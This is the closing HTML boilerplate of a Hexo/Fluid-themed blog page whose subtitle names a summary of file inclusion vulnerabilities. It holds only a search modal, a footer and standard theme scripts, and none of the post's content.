        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  <footer class="mt-5">
  <div class="text-center py-3">
    <!-- <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><b>Hexo</b></a>
    <i class="iconfont icon-love"></i>
    <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"> <b>Fluid</b></a> -->
    <b>Copyright &copy; 2019.</b><a href="/"><b>Lethe</b></a>
    <br>
    
  </div>
</footer>

<!-- SCRIPTS -->
<script src="https://cdn.jsdelivr.net/gh/fluid-dev/hexo-theme-fluid@1.5.1/source/lib/jquery/jquery.min.js"></script>
<script src="https://cdn.jsdelivr.net/gh/fluid-dev/hexo-theme-fluid@1.5.1/source/lib/popper/popper.min.js"></script>
<script src="https://cdn.jsdelivr.net/gh/fluid-dev/hexo-theme-fluid@1.5.1/source/lib/bootstrap/js/bootstrap.min.js"></script>
<script src="https://cdn.jsdelivr.net/gh/fluid-dev/hexo-theme-fluid@1.5.1/source/lib/mdbootstrap/js/mdb.min.js"></script>
<script src="/js/main.js"></script>

  <script src="/js/lazyload.js"></script>


  
    <script src="https://cdn.jsdelivr.net/gh/fluid-dev/hexo-theme-fluid@1.5.1/source/lib/tocbot/tocbot.min.js"></script>
  
  <script src="/js/post.js"></script>


  <script src="https://cdn.jsdelivr.net/gh/fluid-dev/hexo-theme-fluid@1.5.1/source/lib/prettify/prettify.min.js"></script>
  <script>
    $(document).ready(function () {
      $('pre').addClass('prettyprint linenums');
      prettyPrint();
    })
  </script>


  <script src="https://cdn.jsdelivr.net/gh/fluid-dev/hexo-theme-fluid@1.5.1/source/lib/typed/typed.min.js"></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "文件包含漏洞总结&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>


  <script src="https://cdn.jsdelivr.net/gh/fluid-dev/hexo-theme-fluid@1.5.1/source/lib/anchor/anchor.min.js"></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "false",
      
      icon: "§"
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script src="/js/local-search.js"></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      getSearchFile(path);
      this.onclick = null
    }
  </script>



  <script>
    if (/(iPhone|iPad|iPod|iOS)/i.test(navigator.userAgent) || (/Safari/i.test(navigator.userAgent) && !/Chrome/i.test(navigator.userAgent))) {
      $("#background").css("background-attachment", "scroll");
    }
  </script>

</body>
</html>
